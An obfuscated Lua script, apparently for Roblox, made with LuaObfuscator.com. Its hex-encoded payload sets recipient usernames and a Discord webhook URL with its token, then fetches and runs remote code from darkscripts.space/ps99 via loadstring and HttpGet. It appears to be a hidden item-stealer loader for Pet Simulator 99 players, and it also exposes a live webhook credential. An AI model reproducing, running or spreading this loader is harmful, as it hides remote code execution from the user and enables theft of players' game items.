--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v93=0;local v94;while true do if (v93==1) then return v94;end if (v93==0) then v94=v5(v82,v19);v19=nil;v93=1;end end else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -(877 -(282 + 595)))) then v84=(v31/((3 -1)^(v32-(2 -1))))%(2^(((v33-(620 -((2192 -(1523 + 114)) + 64))) -(v32-(932 -(857 + 74)))) + 1)) ;return v84-(v84%(569 -(367 + 201))) ;end end else local v85=2^(v32-((834 + 94) -(214 + (1015 -302)))) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (0 + (1065 -(68 + 997))) ;end end local function v21() local v34=(2227 -(892 + 65)) -(226 + 1044) ;local v35;while true do if (v34==(4 -3)) then return v35;end if (v34==((278 -161) -(32 + 85))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=(1 -0) + (0 -0) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + 2 ;return (v37 * (436 -(67 + 113))) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 3 + 1 ;return (v41 * (41190819 -24413603)) + (v40 * (48199 + 17337)) + (v39 * 256) + v38 ;end local function v24() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==0) then v43=v23();v44=v23();v42=953 -(802 + 150) ;end if (v42==(7 -4)) then if (v47==(0 -(0 + 0))) then if (v46==0) then return v48 * (0 + 0) ;else v47=998 -(915 + 82) ;v45=0;end elseif (v47==(5796 -3749)) then return ((v46==(0 + 0)) and (v48 * ((1 -0)/(1187 -(1069 + 97 + 21))))) or (v48 * NaN) ;end return v8(v48,v47-(2320 -1297) ) * (v45 + (v46/((3 -1)^(10 + (814 -(201 + 571)))))) ;end if (v42==(3 -1)) then v47=v20(v44,21 + 0 ,822 -(368 + 423) );v48=((v20(v44,(1238 -(116 + 1022)) -(283 -215) )==((12 + 7) -(10 + 8))) and  -1) or (3 -2) ;v42=445 -(416 + 26) ;end if (v42==(3 -2)) then v45=1 + 0 ;v46=(v20(v44,1 -(0 -0) ,458 -(145 + 293) ) * (2^(462 -(44 + 386)))) + v43 ;v42=1488 -(998 + (1732 -1244)) ;end end end local function v25(v49) local v50;if  not v49 then local v86=859 -(814 + 45) ;while true do if (v86==0) then v49=v23();if (v49==(0 -(885 -(261 + 624)))) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v66=1 + 0 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v52==(290 -(60 + 230))) then local v90=(function() return 285 -(134 + 151) ;end)();while true do if (v90==1) then v55=(function() return {};end)();v52=(function() return 1;end)();break;end if (v90~=0) then else v53=(function() return function(v112,v113,v114) local v115=(function() return 0;end)();local v116=(function() return;end)();while true do if (v115~=0) then else v116=(function() return 0 + 0 ;end)();while true do if (0~=v116) then else local v171=(function() return 0;end)();while true do if (v171==(1665 -(970 + 695))) then v112[v113-#"}" ]=(function() return v114();end)();return v112,v113,v114;end end end end break;end end end;end)();v54=(function() return {};end)();v90=(function() return 1 -0 ;end)();end end end if (v52~=1) then else local v91=(function() return 1990 -(582 + 1408) ;end)();while true do if (v91==(3 -2)) then v58=(function() return v23();end)();v52=(function() return 5 -3 ;end)();break;end if (v91==(0 -0)) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v91=(function() return 3 -2 ;end)();end end end if (v52==(1826 -(1195 + 629))) then v59=(function() return {};end)();for v95= #"!",v58 do local v96=(function() return 1271 -(945 + 326) ;end)();local v97=(function() return;end)();local v98=(function() return;end)();while true do if (v96~=0) then else v97=(function() return v21();end)();v98=(function() return nil;end)();v96=(function() return 1 -0 ;end)();end if (v96~=1) then else if (v97== #">") then v98=(function() return v21()~=(241 -(187 + 54)) ;end)();elseif (v97==2) then v98=(function() return v24();end)();elseif (v97~= #"-19") then else v98=(function() return v25();end)();end v59[v95]=(function() return v98;end)();break;end end end v57[ #"asd"]=(function() return v21();end)();v52=(function() return 783 -(162 + 618) ;end)();end if ((3 + 0)~=v52) then else for v99= #"[",v23() do local v100=(function() return v21();end)();if (v20(v100, #",", #"[")==(0 + 0)) then local v106=(function() return 0 -0 ;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (v106==(0 -0)) then local v117=(function() return 0 + 0 ;end)();while true do if (v117==(0 + 0)) then v107=(function() return 1636 -(1373 + 263) ;end)();v108=(function() return nil;end)();v117=(function() return 1 + 0 ;end)();end if (v117==(1001 -(451 + 549))) then v106=(function() return 1;end)();break;end end end if (v106==1) then v109=(function() return nil;end)();v110=(function() return nil;end)();v106=(function() return 2;end)();end if (v106==(1 + 1)) then while true do if (v107== #"{") then local v150=(function() return 1500 -(1408 + 92) ;end)();local v151=(function() return;end)();while true do if (v150~=(0 -0)) then else v151=(function() return 0;end)();while true do if (v151==0) then v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==0) then local v180=(function() return 1086 -(461 + 625) ;end)();local v181=(function() return;end)();while true do if ((0 -0)==v180) then v181=(function() return 1384 -(746 + 638) ;end)();while true do if (v181==0) then v110[ #"19("]=(function() return v22();end)();v110[ #"0836"]=(function() return v22();end)();break;end end break;end end elseif (v108== #"}") then v110[ #"xxx"]=(function() return v23();end)();elseif (v108==(1 + 1)) then v110[ #"xnx"]=(function() return v23() -((1 + 1)^(23 -7)) ;end)();elseif (v108== #"19(") then local v188=(function() return 0;end)();local v189=(function() return;end)();while true do if (v188==(0 + 0)) then v189=(function() return 341 -(218 + 123) ;end)();while true do if (v189==(1581 -(1535 + 46))) then v110[ #"19("]=(function() return v23() -((1 + 1)^(545 -(406 + 123))) ;end)();v110[ #"?id="]=(function() return v22();end)();break;end end break;end end end v151=(function() return 1;end)();end if (v151==1) then v107=(function() return 1771 -(1749 + 20) ;end)();break;end end break;end end end if (v107== #"xnx") then if (v20(v109, #"nil", #"19(")~= #",") then else v110[ #".com"]=(function() return v59[v110[ #"0313"]];end)();end v54[v99]=(function() return v110;end)();break;end if (v107==(0 + 0)) then local v153=(function() return 0 + 0 ;end)();local v154=(function() return;end)();while true do if (v153==(560 -(306 + 254))) then v154=(function() return 0;end)();while true do if (v154~=0) then else v108=(function() return v20(v100,1 + 1 , #"-19");end)();v109=(function() return v20(v100, #".com",1328 -(1249 + 73) );end)();v154=(function() return 1 -0 ;end)();end if (v154~=(1468 -(899 + 568))) then else v107=(function() return  #" ";end)();break;end end break;end end end if (v107==(1147 -(466 + 679))) then local v155=(function() return 0;end)();local v156=(function() return;end)();while true do if (v155~=0) then else v156=(function() return 0 -0 ;end)();while true do if (v156~=(1 + 0)) then else v107=(function() return  #"xxx";end)();break;end if (v156==(0 -0)) then if (v20(v109, #"|", #",")== #"\\") then v110[4 -2 ]=(function() return v59[v110[2]];end)();end if (v20(v109,2,2)== #"|") then v110[ #"91("]=(function() return v59[v110[ #"xnx"]];end)();end v156=(function() return 604 -(268 + 335) ;end)();end end break;end end end end break;end end end end for v101= #"]",v23() do v55,v101,v28=(function() return v53(v55,v101,v28);end)();end return v57;end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[(2 -1) + 1 ];local v65=v60[1 + 2 ];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -(2 -1);local v74={};local v75={...};local v76=v12("#",...) -((217 -102) -(4 + 110)) ;local v77={};local v78={};for v87=(2517 -(565 + 1368)) -(57 + (1981 -1454)) ,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + (1428 -(41 + 1386)) ];end end local v79=(v76-v70) + (104 -(17 + (324 -(64 + 174)))) ;local v80;local v81;while true do v80=v68[v72];v81=v80[1 + 0 ];if (v81<=((2 + 12) -7)) then if ((v81<=3) or (142>=4749)) then if (v81<=((1663 -(1477 + 184)) -(1 -0))) then if ((1293<=2166) and (3926<=4134) and (v81==((245 -79) -(122 + 44)))) then v78[v80[2 -0 ]]=v62[v80[9 -(342 -(144 + 192)) ]];else local v120=v80[2 + 0 ];v78[v120]=v78[v120](v13(v78,v120 + 1 + 0 ,v73));end elseif ((v81>(3 -1)) or (164>=2785)) then local v122=0;local v123;local v124;local v125;local v126;while true do if ((v122==((63 + 4) -(30 + 35))) or (525==2109)) then for v173=v123,v73 do v126=v126 + 1 + 0 ;v78[v173]=v124[v126];end break;end if (v122==(217 -(42 + 174))) then v73=(v125 + v123) -(1 + 0) ;v126=1257 -(864 + 179 + 214) ;v122=7 -5 ;end if ((33==33) and (v122==(1212 -(323 + 889)))) then v123=v80[5 -3 ];v124,v125=v71(v78[v123](v13(v78,v123 + (581 -(361 + 219)) ,v80[323 -(53 + 267) ])));v122=1 + (0 -0) ;end end else local v127=413 -(7 + 8 + 398) ;local v128;local v129;while true do if ((v127==(982 -(18 + 964))) or (2579<123)) then v128=v80[7 -(1509 -(363 + 1141)) ];v129=v78[v80[2 + 1 ]];v127=1 + (1580 -(1183 + 397)) ;end if (v127==(851 -(20 + 830))) then v78[v128 + 1 + 0 ]=v129;v78[v128]=v129[v80[130 -(116 + 10) ]];break;end end end elseif (v81<=(1 + (11 -7))) then if ((v81>(742 -(542 + 196))) or (846>=2368)) then v78[v80[3 -1 ]]=v62[v80[1 + 2 ]];else local v132=0 + 0 ;local v133;local v134;local v135;local v136;while true do if (((3054<=4015) and (v132==((2 -1) + 1))) or (4012<=3358)) then for v176=v133,v73 do v136=v136 + (2 -1) ;v78[v176]=v134[v136];end break;end if ((2 -1)==v132) then v73=(v135 + v133) -(1552 -(1126 + (729 -(244 + 60)))) ;v136=405 -(118 + 287) ;v132=7 -5 ;end if ((0 + 0)==v132) then v133=v80[1123 -(118 + (1479 -(41 + 435))) ];v134,v135=v71(v78[v133](v13(v78,v133 + (2 -1) ,v80[3])));v132=1 + 0 ;end end end elseif (v81>(383 -(142 + (1236 -(938 + 63))))) then local v137=0 -0 ;local v138;local v139;while true do if (v137==(1 + 0 + 0)) then v78[v138 + 1 ]=v139;v78[v138]=v139[v80[981 -(553 + 327 + 97) ]];break;end if (v137==0) then v138=v80[(1128 -(936 + 189)) -1 ];v139=v78[v80[3 + 0 ]];v137=1 + 0 + 0 ;end end else do return;end end elseif (v81<=(7 + 4)) then if (v81<=(4 + 5)) then if (v81>(5 + 3)) then v62[v80[(1981 -(1913 + 62)) -3 ]]=v78[v80[5 -(2 + 1) ]];else do return;end end elseif ((1494<=3005) and (v81==(22 -12))) then v78[v80[2]]();else v78[v80[(1614 -(1565 + 48)) + 1 ]]();end elseif ((v81<=((39 + 23) -(1187 -(782 + 356)))) or (3111==2134)) then if ((1871<3382) and (v81>(765 -(239 + 514)))) then v62[v80[(269 -(176 + 91)) + (2 -1) ]]=v78[v80[1331 -(797 + 532) ]];else v78[v80[2 + 0 ]]=v80[2 + 1 ];end elseif (v81==(32 -18)) then v78[v80[1204 -(373 + 829) ]]=v80[734 -(476 + 255) ];else local v148=0;local v149;while true do if ((1130 -(369 + 761))==v148) then v149=v80[2 + 0 ];v78[v149]=v78[v149](v13(v78,v149 + 1 ,v73));break;end end end v72=v72 + (1 -0) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q0003083Q00557365726E616D65030C3Q00546865506F776572426F783703093Q00557365726E616D653203093Q00417A2Q656D3531323303073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F313239373532333930363139373835323138332F74335061624131685A4F7469754F32714351356C4C4361337246745962474573466B4879637A3162684D5654385F577479724B5957697A457253504B7347307738365973030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031E3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F70732Q39000E3Q00120E3Q00023Q00120D3Q00013Q00120E3Q00043Q00120D3Q00033Q00120E3Q00063Q00120D3Q00053Q0012053Q00073Q001205000100083Q00200200010001000900120E0003000A4Q0003000100034Q000F5Q00022Q000B3Q000100012Q00083Q00017Q00",v9(),...);
